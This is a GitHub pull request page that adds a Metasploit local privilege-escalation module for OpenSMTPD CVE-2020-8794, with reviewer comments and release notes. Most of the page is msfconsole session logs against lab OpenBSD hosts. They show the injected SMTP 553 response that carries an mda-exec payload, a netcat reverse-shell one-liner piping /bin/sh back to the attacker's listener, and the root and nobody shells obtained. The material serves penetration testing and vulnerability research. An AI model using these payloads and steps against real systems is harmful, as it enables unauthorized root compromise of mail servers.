Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add OpenSMTPD CVE-2020-8794 LPE exploit #13003

Merged
merged 6 commits into from
Mar 4, 2020
Merged

Add OpenSMTPD CVE-2020-8794 LPE exploit #13003

merged 6 commits into from
Mar 4, 2020

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Feb 27, 2020
edited
Loading

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing

Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0

[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N]  y

OpenSMTPD 6.0.4 on OpenBSD 6.3

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

type: mda
mda-method: mda
mda-usertable: <getpwnam>
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0

[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.

id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64

#12889

@wvu wvu added module blocked Blocked by one or more additional tasks feature needs-docs labels Feb 27, 2020
@wvu wvu force-pushed the feature/opensmtpd branch 3 times, most recently from 921f3ed to 89e5c4c Compare February 27, 2020 18:11
@wvu wvu removed the needs-docs label Feb 28, 2020
@wvu wvu marked this pull request as ready for review February 28, 2020 16:52
@wvu
Copy link
Contributor Author

wvu commented Mar 2, 2020

I'll see what I can do once the existing to-dos are finished. It may be desirable for CVE-2020-7247, too. Note that since this is a local exploit, TLS would be on the connect back to the fake SMTP server. The sendmail(8) interaction is all local to the target.

@wvu wvu force-pushed the feature/opensmtpd branch 6 times, most recently from f319607 to 96269d9 Compare March 3, 2020 20:24
@wvu wvu changed the title [WIP] Add OpenSMTPD CVE-2020-8794 LPE exploit Add OpenSMTPD CVE-2020-8794 LPE exploit Mar 3, 2020
@wvu wvu removed the blocked Blocked by one or more additional tasks label Mar 3, 2020
@wvu wvu force-pushed the feature/opensmtpd branch 2 times, most recently from 77ff255 to c5f8e49 Compare March 3, 2020 22:21
@wvu wvu force-pushed the feature/opensmtpd branch 4 times, most recently from fed8927 to e962dbd Compare March 3, 2020 23:55
@wvu wvu force-pushed the feature/opensmtpd branch 3 times, most recently from c73d6f3 to 2377729 Compare March 4, 2020 00:11
@wvu
Copy link
Contributor Author

wvu commented Mar 4, 2020

If we add TLS support, it'll be in a subsequent PR. This bucket is full.

@space-r7 space-r7 self-assigned this Mar 4, 2020
@space-r7
Copy link
Contributor

space-r7 commented Mar 4, 2020

Tested against OpenSMTPD v6.6.0. Code LGTM:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.169:40226) at 2020-03-04 13:18:45 -0600

whoami
opensmtpd_user
background

Background session 1? [y/N]  y
msf5 exploit(multi/handler) > use exploit/unix/local/opensmtpd_oob_read_lpe 
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > check

[!] SESSION may not be compatible with this module.
[*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25 
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'sktnbrpuuoha@[192.168.37.1]' < /dev/null && echo true
[*] Client 192.168.37.169:39706 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/pvkde; nc 192.168.37.1 4444 0</tmp/pvkde | /bin/sh >/tmp/pvkde 2>&1; rm /tmp/pvkde; exit 0

[*] Disconnecting client 192.168.37.169:39706
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.169:47937) at 2020-03-04 13:19:16 -0600
[*] Server stopped.

whoami
root
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64

@space-r7 space-r7 merged commit 5698f6e into rapid7:master Mar 4, 2020
@space-r7
Copy link
Contributor

space-r7 commented Mar 4, 2020
edited by tperry-r7
Loading

Release Notes

This adds a local exploit module for an out-of-bounds read vulnerability in OpenSMTPD for versions < v6.6.4. Depending on the grammar used by OpenSMTPD, an attacker can gain privileges as either root or the nobody user.

@wvu
Copy link
Contributor Author

wvu commented Mar 4, 2020

Thanks so much, @space-r7! I hope it didn't take up much of your time.

@wvu wvu deleted the feature/opensmtpd branch March 5, 2020 00:52
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 16, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
feature module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wvu @space-r7 @tperry-r7